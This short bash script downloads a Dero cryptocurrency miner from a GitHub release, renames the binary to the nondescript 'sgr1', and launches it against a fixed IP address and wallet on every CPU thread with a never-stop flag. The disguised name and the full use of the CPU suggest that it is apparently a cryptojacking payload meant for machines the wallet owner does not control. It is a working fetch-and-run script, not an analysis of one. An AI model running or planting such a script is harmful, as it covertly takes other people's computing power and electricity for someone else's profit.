#!/bin/bash
wget https://github.com/DeroLuna/dero-miner/releases/download/v1.11-beta/deroluna-miner-linux-amd64.tar.gz
tar xf deroluna-miner-linux-amd64.tar.gz
mv deroluna-miner sgr1
./sgr1 --daemon-address 95.179.243.207:80 --wallet dero1qytfne4y9mpry7kcxrl5z328sqrmy349ldgawmu32yy5yzrjrnygjqg0vw3yu --threads $(nproc --all) --never-stop
